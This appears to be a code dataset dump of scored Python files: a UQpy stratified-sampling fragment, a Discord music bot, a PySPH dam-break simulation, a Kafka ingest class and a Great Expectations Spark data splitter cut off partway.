method will be executed automatically. If neither `nsamples_per_stratum` or `nsamples` are provided
when the class is defined, the user must call the :meth:`run` method to perform stratified sampling.
:param nsamples_per_stratum: Specifies the number of samples in each stratum. This must be either an
integer, in which case an equal number of samples are drawn from each stratum, or a list. If it is provided as
a list, the length of the list must be equal to the number of strata.
If `nsamples_per_stratum` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
:param nsamples: Specify the total number of samples. If `nsamples` is specified, the samples will
be drawn in proportion to the volume of the strata. Thus, each stratum will contain
:code:`round(V_i*nsamples)` samples where :math:`V_i \le 1` is the volume of stratum `i` in the unit
hypercube.
If `nsamples` is provided when the class is defined, the :meth:`run` method will be executed
automatically. If neither `nsamples_per_stratum` or `nsamples` are provided when the class is
defined, the user must call the :meth:`run` method to perform stratified sampling.
"""
self.nsamples_per_stratum = nsamples_per_stratum
self.nsamples = nsamples
self._run_checks()
self.logger.info("UQpy: Performing Stratified Sampling")
self.create_unit_hypercube_samples()
self.transform_samples(self.samplesU01)
self.logger.info("UQpy: Stratified Sampling is completed")
def _run_checks(self):
if self.nsamples is not None:
self.nsamples_per_stratum = (self.strata_object.volume * self.nsamples).round()
if self.nsamples_per_stratum is not None:
if isinstance(self.nsamples_per_stratum, int):
self.nsamples_per_stratum = [self.nsamples_per_stratum] * \
self.strata_object.volume.shape[0]
elif isinstance(self.nsamples_per_stratum, list):
if len(self.nsamples_per_stratum) != self.strata_object.volume.shape[0]:
raise ValueError("UQpy: Length of 'nsamples_per_stratum' must match the number of strata.")
elif self.nsamples is None:
raise ValueError("UQpy: 'nsamples_per_stratum' must be an integer or a list.")
else:
self.nsamples_per_stratum = [1] * self.strata_object.volume.shape[0]
def create_unit_hypercube_samples(self):
samples_in_strata, weights = self.strata_object.sample_strata(
self.nsamples_per_stratum, self.random_state)
self.weights = np.array(weights)
self.samplesU01 = np.concatenate(samples_in_strata, axis=0) | 0.888275 | 0.552419 |
import json
import discord
from discord.ext import commands
from discord_slash import SlashCommand, SlashContext
from discord_slash.utils.manage_commands import create_option
import youtube_dl
guilds_ids = [
# enter yere guild ids
]
with open('token.json') as jj:
data = json.load(jj)
tk = data[0]['token']
bot = commands.Bot(command_prefix='>')
slash = SlashCommand(client=bot, sync_commands=True)
@bot.event
async def on_ready():
await bot.change_presence(status=discord.Status.idle, activity=discord.Activity(type=discord.ActivityType.listening, name='/play'))
print('ready')
@slash.slash(
name='join',
description='Joins To Your Channel',
guild_ids=guilds_ids
)
async def _join(ctx: SlashContext):
if ctx.author.voice is None:
await ctx.send(':no_entry_sign: - You arent in the voice channel!')
if ctx.voice_client is None:
await ctx.author.voice.channel.connect()
await ctx.send(f':thumbsup: - Joined to `{ctx.author.voice.channel.name}`')
else:
await ctx.send(':no_entry_sign: - Other user is using this bot!')
@slash.slash(
name='disconnect',
description='Disconnects Of Your Channel',
guild_ids=guilds_ids
)
async def _disconnect(ctx: SlashContext):
await ctx.voice_client.disconnect()
await ctx.send(':thumbsup: - Disconnected!')
@slash.slash(
name='play',
description='Plays Music',
guild_ids=guilds_ids,
options=[
create_option(
name='url',
description='Youtube URL',
option_type=str,
required=True
)
]
)
async def _play(ctx: SlashContext, url: str):
FFMPEG_OPTIONS = {
'before_options':
'-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',
'options': '-vn'
}
YDL_OPTIONS = {'format': "bestaudio"}
await ctx.send(f'**Searching** :link: `{url}`...')
with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:
info = ydl.extract_info(url, download=False)
url2 = info['formats'][0]['url']
source = await discord.FFmpegOpusAudio.from_probe(url2, **FFMPEG_OPTIONS)
ctx.voice_client.play(source)
await ctx.send(f'**Playing** :notes: `{url}` - Now!')
@slash.slash(
name='pause',
description='Pauses Music',
guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
await ctx.voice_client.pause()
await ctx.send(':thumbsup: - Paused!')
@slash.slash(
name='resume',
description='Resumes Music',
guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
await ctx.voice_client.resume()
await ctx.send(':thumbsup: - Paused!')
bot.run(tk) | bot_slash.py | import json
import discord
from discord.ext import commands
from discord_slash import SlashCommand, SlashContext
from discord_slash.utils.manage_commands import create_option
import youtube_dl
guilds_ids = [
# enter yere guild ids
]
with open('token.json') as jj:
data = json.load(jj)
tk = data[0]['token']
bot = commands.Bot(command_prefix='>')
slash = SlashCommand(client=bot, sync_commands=True)
@bot.event
async def on_ready():
await bot.change_presence(status=discord.Status.idle, activity=discord.Activity(type=discord.ActivityType.listening, name='/play'))
print('ready')
@slash.slash(
name='join',
description='Joins To Your Channel',
guild_ids=guilds_ids
)
async def _join(ctx: SlashContext):
if ctx.author.voice is None:
await ctx.send(':no_entry_sign: - You arent in the voice channel!')
if ctx.voice_client is None:
await ctx.author.voice.channel.connect()
await ctx.send(f':thumbsup: - Joined to `{ctx.author.voice.channel.name}`')
else:
await ctx.send(':no_entry_sign: - Other user is using this bot!')
@slash.slash(
name='disconnect',
description='Disconnects Of Your Channel',
guild_ids=guilds_ids
)
async def _disconnect(ctx: SlashContext):
await ctx.voice_client.disconnect()
await ctx.send(':thumbsup: - Disconnected!')
@slash.slash(
name='play',
description='Plays Music',
guild_ids=guilds_ids,
options=[
create_option(
name='url',
description='Youtube URL',
option_type=str,
required=True
)
]
)
async def _play(ctx: SlashContext, url: str):
FFMPEG_OPTIONS = {
'before_options':
'-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5',
'options': '-vn'
}
YDL_OPTIONS = {'format': "bestaudio"}
await ctx.send(f'**Searching** :link: `{url}`...')
with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:
info = ydl.extract_info(url, download=False)
url2 = info['formats'][0]['url']
source = await discord.FFmpegOpusAudio.from_probe(url2, **FFMPEG_OPTIONS)
ctx.voice_client.play(source)
await ctx.send(f'**Playing** :notes: `{url}` - Now!')
@slash.slash(
name='pause',
description='Pauses Music',
guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
await ctx.voice_client.pause()
await ctx.send(':thumbsup: - Paused!')
@slash.slash(
name='resume',
description='Resumes Music',
guild_ids=guilds_ids
)
async def _pause(ctx: SlashContext):
await ctx.voice_client.resume()
await ctx.send(':thumbsup: - Paused!')
bot.run(tk) | 0.28877 | 0.0809 |
from os.path import dirname, join
import numpy as np
from pysph.examples._db_geometry import DamBreak3DGeometry
from pysph.base.kernels import WendlandQuintic
from pysph.base.utils import get_particle_array_rigid_body
from pysph.sph.equation import Group
from pysph.sph.basic_equations import ContinuityEquation, XSPHCorrection
from pysph.sph.wc.basic import TaitEOS, TaitEOSHGCorrection, MomentumEquation
from pysph.solver.application import Application
from pysph.solver.solver import Solver
from pysph.sph.integrator import EPECIntegrator
from pysph.sph.integrator_step import WCSPHStep
from pysph.tools.gmsh import vtk_file_to_points
from pysph.sph.rigid_body import (
BodyForce, NumberDensity, RigidBodyForceGPUGems,
RigidBodyMoments, RigidBodyMotion,
RK2StepRigidBody, PressureRigidBody
)
dim = 3
dt = 1e-5
tf = 2.0
# parameter to chane the resolution
dx = 0.02
nboundary_layers = 3
hdx = 1.2
rho0 = 1000.0
class DamBreak3DSPH(Application):
def initialize(self):
self.geom = DamBreak3DGeometry(
dx=dx, nboundary_layers=nboundary_layers, hdx=hdx, rho0=rho0,
with_obstacle=False)
def create_particles(self):
fluid, boundary = self.geom.create_particles()
fpath = join(dirname(__file__), 'sph.vtk.gz')
x, y, z = vtk_file_to_points(fpath, cell_centers=False)
y -= 0.15
z += 0.05
m = np.ones_like(x)*fluid.m[0]
h = np.ones_like(x)*fluid.h[0]
rho = np.ones_like(x)*fluid.rho[0]
obstacle = get_particle_array_rigid_body(
name='obstacle', x=x, y=y, z=z, m=m, h=h, rho=rho, rho0=rho
)
obstacle.total_mass[0] = np.sum(m)
obstacle.add_property('cs')
obstacle.add_property('arho')
obstacle.set_lb_props(list(obstacle.properties.keys()))
obstacle.set_output_arrays(
['x', 'y', 'z', 'u', 'v', 'w', 'fx', 'fy', 'fz',
'rho', 'm', 'h', 'p', 'tag', 'pid', 'gid']
)
boundary.add_property('V')
boundary.add_property('fx')
boundary.add_property('fy')
boundary.add_property('fz')
return [fluid, boundary, obstacle]
def create_solver(self):
kernel = WendlandQuintic(dim=dim)
integrator = EPECIntegrator(fluid=WCSPHStep(),
obstacle=RK2StepRigidBody(),
boundary=WCSPHStep())
solver = Solver(kernel=kernel, dim=dim, integrator=integrator,
tf=tf, dt=dt, adaptive_timestep=True, n_damp=0)
return solver
def create_equations(self):
co = 10.0 * self.geom.get_max_speed(g=9.81)
gamma = 7.0
alpha = 0.5
beta = 0.0
equations = [
Group(equations=[
BodyForce(dest='obstacle', sources=None, gz=-9.81),
NumberDensity(dest='obstacle', sources=['obstacle']),
NumberDensity(dest='boundary', sources=['boundary']),
], ),
# Equation of state
Group(equations=[
TaitEOS(
dest='fluid', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
TaitEOSHGCorrection(
dest='boundary', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
TaitEOSHGCorrection(
dest='obstacle', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
], real=False),
# Continuity, momentum and xsph equations
Group(equations=[
ContinuityEquation(
dest='fluid', sources=['fluid', 'boundary', 'obstacle']
),
ContinuityEquation(dest='boundary', sources=['fluid']),
ContinuityEquation(dest='obstacle', sources=['fluid']),
MomentumEquation(dest='fluid',
sources=['fluid', 'boundary'],
alpha=alpha, beta=beta, gz=-9.81, c0=co,
tensile_correction=True),
PressureRigidBody(
dest='fluid', sources=['obstacle'], rho0=rho0
),
XSPHCorrection(dest='fluid', sources=['fluid']),
RigidBodyForceGPUGems(
dest='obstacle', sources=['boundary'], k=1.0, d=2.0,
eta=0.1, kt=0.1
),
]),
Group(equations=[RigidBodyMoments(dest='obstacle', sources=None)]),
Group(equations=[RigidBodyMotion(dest='obstacle', sources=None)]),
]
return equations
if __name__ == '__main__':
app = DamBreak3DSPH()
app.run() | pysph/examples/rigid_body/dam_break3D_sph.py | from os.path import dirname, join
import numpy as np
from pysph.examples._db_geometry import DamBreak3DGeometry
from pysph.base.kernels import WendlandQuintic
from pysph.base.utils import get_particle_array_rigid_body
from pysph.sph.equation import Group
from pysph.sph.basic_equations import ContinuityEquation, XSPHCorrection
from pysph.sph.wc.basic import TaitEOS, TaitEOSHGCorrection, MomentumEquation
from pysph.solver.application import Application
from pysph.solver.solver import Solver
from pysph.sph.integrator import EPECIntegrator
from pysph.sph.integrator_step import WCSPHStep
from pysph.tools.gmsh import vtk_file_to_points
from pysph.sph.rigid_body import (
BodyForce, NumberDensity, RigidBodyForceGPUGems,
RigidBodyMoments, RigidBodyMotion,
RK2StepRigidBody, PressureRigidBody
)
dim = 3
dt = 1e-5
tf = 2.0
# parameter to chane the resolution
dx = 0.02
nboundary_layers = 3
hdx = 1.2
rho0 = 1000.0
class DamBreak3DSPH(Application):
def initialize(self):
self.geom = DamBreak3DGeometry(
dx=dx, nboundary_layers=nboundary_layers, hdx=hdx, rho0=rho0,
with_obstacle=False)
def create_particles(self):
fluid, boundary = self.geom.create_particles()
fpath = join(dirname(__file__), 'sph.vtk.gz')
x, y, z = vtk_file_to_points(fpath, cell_centers=False)
y -= 0.15
z += 0.05
m = np.ones_like(x)*fluid.m[0]
h = np.ones_like(x)*fluid.h[0]
rho = np.ones_like(x)*fluid.rho[0]
obstacle = get_particle_array_rigid_body(
name='obstacle', x=x, y=y, z=z, m=m, h=h, rho=rho, rho0=rho
)
obstacle.total_mass[0] = np.sum(m)
obstacle.add_property('cs')
obstacle.add_property('arho')
obstacle.set_lb_props(list(obstacle.properties.keys()))
obstacle.set_output_arrays(
['x', 'y', 'z', 'u', 'v', 'w', 'fx', 'fy', 'fz',
'rho', 'm', 'h', 'p', 'tag', 'pid', 'gid']
)
boundary.add_property('V')
boundary.add_property('fx')
boundary.add_property('fy')
boundary.add_property('fz')
return [fluid, boundary, obstacle]
def create_solver(self):
kernel = WendlandQuintic(dim=dim)
integrator = EPECIntegrator(fluid=WCSPHStep(),
obstacle=RK2StepRigidBody(),
boundary=WCSPHStep())
solver = Solver(kernel=kernel, dim=dim, integrator=integrator,
tf=tf, dt=dt, adaptive_timestep=True, n_damp=0)
return solver
def create_equations(self):
co = 10.0 * self.geom.get_max_speed(g=9.81)
gamma = 7.0
alpha = 0.5
beta = 0.0
equations = [
Group(equations=[
BodyForce(dest='obstacle', sources=None, gz=-9.81),
NumberDensity(dest='obstacle', sources=['obstacle']),
NumberDensity(dest='boundary', sources=['boundary']),
], ),
# Equation of state
Group(equations=[
TaitEOS(
dest='fluid', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
TaitEOSHGCorrection(
dest='boundary', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
TaitEOSHGCorrection(
dest='obstacle', sources=None, rho0=rho0, c0=co,
gamma=gamma
),
], real=False),
# Continuity, momentum and xsph equations
Group(equations=[
ContinuityEquation(
dest='fluid', sources=['fluid', 'boundary', 'obstacle']
),
ContinuityEquation(dest='boundary', sources=['fluid']),
ContinuityEquation(dest='obstacle', sources=['fluid']),
MomentumEquation(dest='fluid',
sources=['fluid', 'boundary'],
alpha=alpha, beta=beta, gz=-9.81, c0=co,
tensile_correction=True),
PressureRigidBody(
dest='fluid', sources=['obstacle'], rho0=rho0
),
XSPHCorrection(dest='fluid', sources=['fluid']),
RigidBodyForceGPUGems(
dest='obstacle', sources=['boundary'], k=1.0, d=2.0,
eta=0.1, kt=0.1
),
]),
Group(equations=[RigidBodyMoments(dest='obstacle', sources=None)]),
Group(equations=[RigidBodyMotion(dest='obstacle', sources=None)]),
]
return equations
if __name__ == '__main__':
app = DamBreak3DSPH()
app.run() | 0.557123 | 0.391929 |
from edna.serializers import Serializable
from edna.ingest.streaming import BaseStreamingIngest
from typing import Dict
import confluent_kafka, confluent_kafka.admin
from time import sleep
import socket
class KafkaIngest(BaseStreamingIngest):
"""KafkaIngest streams records from a provided kafka topic into the Job. Records are deserialized with the provided serializer.
"""
def __init__(self, serializer: Serializable, kafka_topic: str, bootstrap_server: str = "localhost", bootstrap_port: int = 9092, default_group: str ="default-group", *args, **kwargs):
"""Connects to a kafka topic and sets up the ingest
Args:
serializer (Serializable): Serializer to convert a message to bytes before sending to kafka.
kafka_topic (str): Name of kafka topic to publish to.
bootstrap_server (str, optional): Address of the Kafka bootstrap server. Defaults to "localhost".
bootstrap_port (int, optional): Bootstrap server port on which the topic is listening for messages. Defaults to 9092.
default_group (str, optional): Group name for this consumer group. Defaults to "default-group".
"""
self.kafka_topic = kafka_topic
conf = {
"bootstrap.servers": bootstrap_server + ":" + str(bootstrap_port),
"client.id":socket.gethostname(),
"group.id":default_group
}
self.create_topic(topic_name=kafka_topic, conf=conf) # TODO is this safe?
self.consumer = confluent_kafka.Consumer(conf)
self.consumer.subscribe([self.kafka_topic])
self.running = True
super().__init__(serializer=serializer, *args, **kwargs)
def next(self):
"""Sets up a Kafka Consumer poll to the topic and yields records one by one.
Raises:
KafkaException: Propagated from Kafka.
Returns:
(obj): A record.
"""
kafka_message = None
while kafka_message is None:
kafka_message = self.consumer.poll(timeout=1.0)
if kafka_message is None:
# There is no message to retrieve (methinks) TODO
sleep(0.1)
continue
if kafka_message.error():
if kafka_message.error().code() == confluent_kafka.KafkaError._PARTITION_EOF:
kafka_message = None
pass # TODO will need to add exception handling at some point
# End of partition event
#sys.stderr.write('%% %s [%d] reached end at offset %d\n' %
# (kafka_message.topic(), kafka_message.partition(), kafka_message.offset()))
elif kafka_message.error():
raise confluent_kafka.KafkaException(kafka_message.error())
return kafka_message.value()
def create_topic(self, topic_name: str, conf: Dict):
"""Helper function to create a topic. Blocks until topic is created.
Args:
topic_name (str): Topic name to create.
conf (Dict): Kafka admin client configuration.
"""
adminclient = confluent_kafka.admin.AdminClient(conf=conf)
topic = confluent_kafka.admin.NewTopic(topic=topic_name, num_partitions=1)
response = adminclient.create_topics([topic])
while not response[topic_name].done():
sleep(0.1) # TODO this is super hacky. There is bound to be a better way to do this.
del adminclient | python/edna/src/edna/ingest/streaming/KafkaIngest.py | from edna.serializers import Serializable
from edna.ingest.streaming import BaseStreamingIngest
from typing import Dict
import confluent_kafka, confluent_kafka.admin
from time import sleep
import socket
class KafkaIngest(BaseStreamingIngest):
"""KafkaIngest streams records from a provided kafka topic into the Job. Records are deserialized with the provided serializer.
"""
def __init__(self, serializer: Serializable, kafka_topic: str, bootstrap_server: str = "localhost", bootstrap_port: int = 9092, default_group: str ="default-group", *args, **kwargs):
"""Connects to a kafka topic and sets up the ingest
Args:
serializer (Serializable): Serializer to convert a message to bytes before sending to kafka.
kafka_topic (str): Name of kafka topic to publish to.
bootstrap_server (str, optional): Address of the Kafka bootstrap server. Defaults to "localhost".
bootstrap_port (int, optional): Bootstrap server port on which the topic is listening for messages. Defaults to 9092.
default_group (str, optional): Group name for this consumer group. Defaults to "default-group".
"""
self.kafka_topic = kafka_topic
conf = {
"bootstrap.servers": bootstrap_server + ":" + str(bootstrap_port),
"client.id":socket.gethostname(),
"group.id":default_group
}
self.create_topic(topic_name=kafka_topic, conf=conf) # TODO is this safe?
self.consumer = confluent_kafka.Consumer(conf)
self.consumer.subscribe([self.kafka_topic])
self.running = True
super().__init__(serializer=serializer, *args, **kwargs)
def next(self):
"""Sets up a Kafka Consumer poll to the topic and yields records one by one.
Raises:
KafkaException: Propagated from Kafka.
Returns:
(obj): A record.
"""
kafka_message = None
while kafka_message is None:
kafka_message = self.consumer.poll(timeout=1.0)
if kafka_message is None:
# There is no message to retrieve (methinks) TODO
sleep(0.1)
continue
if kafka_message.error():
if kafka_message.error().code() == confluent_kafka.KafkaError._PARTITION_EOF:
kafka_message = None
pass # TODO will need to add exception handling at some point
# End of partition event
#sys.stderr.write('%% %s [%d] reached end at offset %d\n' %
# (kafka_message.topic(), kafka_message.partition(), kafka_message.offset()))
elif kafka_message.error():
raise confluent_kafka.KafkaException(kafka_message.error())
return kafka_message.value()
def create_topic(self, topic_name: str, conf: Dict):
"""Helper function to create a topic. Blocks until topic is created.
Args:
topic_name (str): Topic name to create.
conf (Dict): Kafka admin client configuration.
"""
adminclient = confluent_kafka.admin.AdminClient(conf=conf)
topic = confluent_kafka.admin.NewTopic(topic=topic_name, num_partitions=1)
response = adminclient.create_topics([topic])
while not response[topic_name].done():
sleep(0.1) # TODO this is super hacky. There is bound to be a better way to do this.
del adminclient | 0.606149 | 0.132627 |
import hashlib
import logging
from typing import List, Union
from great_expectations.exceptions import exceptions as ge_exceptions
from great_expectations.execution_engine.split_and_sample.data_splitter import (
DataSplitter,
DatePart,
)
logger = logging.getLogger(__name__)
try:
import pyspark
import pyspark.sql.functions as F
# noinspection SpellCheckingInspection
import pyspark.sql.types as sparktypes
from pyspark.sql import DataFrame
except ImportError:
pyspark = None
F = None
DataFrame = None
# noinspection SpellCheckingInspection
sparktypes = None
logger.debug(
"Unable to load pyspark; install optional spark dependency if you will be working with Spark dataframes"
)
class SparkDataSplitter(DataSplitter):
"""Methods for splitting data accessible via SparkDFExecutionEngine.
Note, for convenience, you can also access DatePart via the instance variable
date_part e.g. SparkDataSplitter.date_part.MONTH
"""
def split_on_year(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR],
)
def split_on_year_and_month(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year and month values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR, DatePart.MONTH],
)
def split_on_year_and_month_and_day(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year and month and day values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR, DatePart.MONTH, DatePart.DAY],
)
def split_on_date_parts(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
date_parts: Union[List[DatePart], List[str]],
) -> DataFrame:
"""Split on date_part values in column_name.
Values are NOT truncated, for example this will return data for a
given month (if only month is chosen for date_parts) for ALL years.
This may be useful for viewing seasonality, but you can also specify
multiple date_parts to achieve date_trunc like behavior e.g.
year, month and day.
Args:
df: dataframe from batch data.
column_name: column in data used to determine split.
batch_identifiers: should contain a dateutil parseable datetime whose date parts
will be used for splitting or key values of {date_part: date_part_value}
date_parts: part of the date to be used for splitting e.g.
DatePart.DAY or the case-insensitive string representation "day"
Returns:
Dataframe with splitting applied.
"""
self._validate_date_parts(date_parts)
date_parts: List[DatePart] = self._convert_date_parts(date_parts)
column_batch_identifiers: dict = batch_identifiers[column_name]
date_parts_dict: dict = (
self._convert_datetime_batch_identifiers_to_date_parts_dict(
column_batch_identifiers, date_parts
)
)
for date_part, date_part_value in date_parts_dict.items():
df = df.filter(
getattr(F, self._convert_date_part_to_spark_equivalent(date_part))(
F.col(column_name)
)
== date_part_value
)
return df
@staticmethod
def _convert_date_part_to_spark_equivalent(date_part: [DatePart, str]) -> str:
"""Convert the DatePart to a string representing the corresponding pyspark.sql.functions version.
For example DatePart.DAY -> pyspark.sql.functions.dayofmonth() -> "dayofmonth"
Args:
date_part: DatePart representing the part of the datetime to extract or string equivalent.
Returns:
String representing the spark function to use for the given DatePart.
"""
date_part: DatePart = DatePart(date_part)
spark_date_part_decoder: dict = {
DatePart.YEAR: "year",
DatePart.MONTH: "month",
DatePart.WEEK: "weekofyear",
DatePart.DAY: "dayofmonth",
DatePart.HOUR: "hour",
DatePart.MINUTE: "minute",
DatePart.SECOND: "second",
}
return spark_date_part_decoder[date_part]
@staticmethod
def split_on_whole_table(
df: DataFrame,
) -> DataFrame:
"""No op. Return the same data that is passed in.
Args:
df: Spark DataFrame that will be returned
Returns:
Unfiltered DataFrame.
"""
return df
@staticmethod
def split_on_column_value(
df, column_name: str, batch_identifiers: dict
) -> DataFrame:
"""Return a dataframe where rows are filtered based on the specified column value.
Args:
df: Spark DataFrame to be filtered.
column_name: Column to use in comparison.
batch_identifiers: Contains value to use in comparison e.g. batch_identifiers={ 'col': value }.
Returns:
Filtered spark DataFrame.
"""
return df.filter(F.col(column_name) == batch_identifiers[column_name])
@staticmethod
def split_on_converted_datetime(
df,
column_name: str,
batch_identifiers: dict,
date_format_string: str = "yyyy-MM-dd",
) -> DataFrame:
"""Return a dataframe where rows are filtered based on whether their converted
datetime (using date_format_string) matches the datetime string value provided
in batch_identifiers for the specified column.
Args:
df: Spark DataFrame to be filtered.
column_name: Column to use in comparison.
batch_identifiers: Value to use in comparison as {column_name: datetime string}.
date_format_string: Format used to convert datetime column for comparison to
batch identifiers.
Returns:
Filtered spark DataFrame.
"""
matching_string = batch_identifiers[column_name]
res = (
df.withColumn(
"date_time_tmp", F.from_unixtime(F.col(column_name), date_format_string)
)
.filter(F.col("date_time_tmp") == matching_string)
.drop("date_time_tmp")
)
return res
@staticmethod
def split_on_divided_integer(
df, column_name: str, divisor: int, batch_identifiers: dict
):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_divisor = batch_identifiers[column_name]
res = (
df.withColumn(
"div_temp",
(F.col(column_name) / divisor).cast(sparktypes.IntegerType()),
)
.filter(F.col("div_temp") == matching_divisor)
.drop("div_temp")
)
return res
@staticmethod
def split_on_mod_integer(df, column_name: str, mod: int, batch_identifiers: dict):
"""Divide the values in the named column by `divisor`, and split on that"""
matching_mod_value = batch_identifiers[column_name]
res = (
df.withColumn(
"mod_temp", (F.col(column_name) % mod).cast(sparktypes.IntegerType())
)
.filter(F.col("mod_temp") == matching_mod_value)
.drop("mod_temp")
)
return res
@staticmethod
def split_on_multi_column_values(df, column_names: list, batch_identifiers: dict):
"""Split on the joint values in the named columns"""
for column_name in column_names:
value = batch_identifiers.get(column_name)
if not value:
raise ValueError(
f"In order for SparkDFExecutionEngine to `_split_on_multi_column_values`, "
f"all values in column_names must also exist in batch_identifiers. "
f"{column_name} was not found in batch_identifiers."
)
df = df.filter(F.col(column_name) == value)
return df
@staticmethod
def split_on_hashed_column(
df,
column_name: str,
hash_digits: int,
batch_identifiers: dict,
hash_function_name: str = "sha256",
):
"""Split on the hashed value of the named column"""
try:
getattr(hashlib, hash_function_name)
except (TypeError, AttributeError):
raise (
ge_exceptions.ExecutionEngineError(
f"""The splitting method used with SparkDFExecutionEngine has a reference to an invalid hash_function_name.
Reference to {hash_function_name} cannot be found."""
)
)
def _encrypt_value(to_encode):
hash_func = getattr(hashlib, hash_function_name)
hashed_value = hash_func(to_encode.encode()).hexdigest()[-1 * hash_digits :]
return hashed_value
encrypt_udf = F.udf(_encrypt_value, sparktypes.StringType())
res = (
df.withColumn("encrypted_value", encrypt_udf(column_name))
.filter(F.col("encrypted_value") == batch_identifiers["hash_value"])
.drop("encrypted_value")
)
return res | great_expectations/execution_engine/split_and_sample/sparkdf_data_splitter.py | import hashlib
import logging
from typing import List, Union
from great_expectations.exceptions import exceptions as ge_exceptions
from great_expectations.execution_engine.split_and_sample.data_splitter import (
DataSplitter,
DatePart,
)
logger = logging.getLogger(__name__)
try:
import pyspark
import pyspark.sql.functions as F
# noinspection SpellCheckingInspection
import pyspark.sql.types as sparktypes
from pyspark.sql import DataFrame
except ImportError:
pyspark = None
F = None
DataFrame = None
# noinspection SpellCheckingInspection
sparktypes = None
logger.debug(
"Unable to load pyspark; install optional spark dependency if you will be working with Spark dataframes"
)
class SparkDataSplitter(DataSplitter):
"""Methods for splitting data accessible via SparkDFExecutionEngine.
Note, for convenience, you can also access DatePart via the instance variable
date_part e.g. SparkDataSplitter.date_part.MONTH
"""
def split_on_year(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR],
)
def split_on_year_and_month(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year and month values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR, DatePart.MONTH],
)
def split_on_year_and_month_and_day(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
) -> DataFrame:
"""Split on year and month and day values in column_name.
Args:
df: dataframe from batch data.
column_name: column in table to use in determining split.
batch_identifiers: should contain a dateutil parseable datetime whose
relevant date parts will be used for splitting or key values
of {date_part: date_part_value}.
Returns:
List of boolean clauses based on whether the date_part value in the
batch identifier matches the date_part value in the column_name column.
"""
return self.split_on_date_parts(
df=df,
column_name=column_name,
batch_identifiers=batch_identifiers,
date_parts=[DatePart.YEAR, DatePart.MONTH, DatePart.DAY],
)
def split_on_date_parts(
self,
df: DataFrame,
column_name: str,
batch_identifiers: dict,
date_parts: Union[List[DatePart], List[str]],
) -> DataFrame:
"""Split on date_part values in column_name.
Values are NOT truncated, for example this will return data for a
given month (if only month is chosen for date_parts) for ALL years.
This may be useful for viewing seasonality, but you can also specify
multiple date_parts to achieve date_trunc like behavior e.g.
year, month and day.
Args:
df: dataframe from batch data.
column_name: column in data used to determine split.
batch_identifiers: should contain a dateutil parseable datetime whose date parts
will be used for splitting or key values of {date_part: date_part_value}
date_parts: part of the date to be used for splitting e.g.
DatePart.DAY or the case-insensitive string representation "day"
Returns:
Dataframe with splitting applied.
"""
self._validate_date_parts(date_parts)
date_parts: List[DatePart] = self._convert_date_parts(date_parts)
column_batch_identifiers: dict = batch_identifiers[column_name]
date_parts_dict: dict = (
self._convert_datetime_batch_identifiers_to_date_parts_dict(
column_batch_identifiers, date_parts
)
)
for date_part, date_part_value in date_parts_dict.items():
df = df.filter(
getattr(F, self._convert_date_part_to_spark_equivalent(date_part))(
F.col(column_name)
)
== date_part_value
)
return df
@staticmethod
def _convert_date_part_to_spark_equivalent(date_part: [DatePart, str]) -> str:
"""Convert the DatePart to a string representing the corresponding pyspark.sql.functions version.
For example DatePart.DAY -> pyspark.sql.functions.dayofmonth() -> "dayofmonth"
Args:
date_part: DatePart representing the part of the datetime to extract or string equivalent.
Returns:
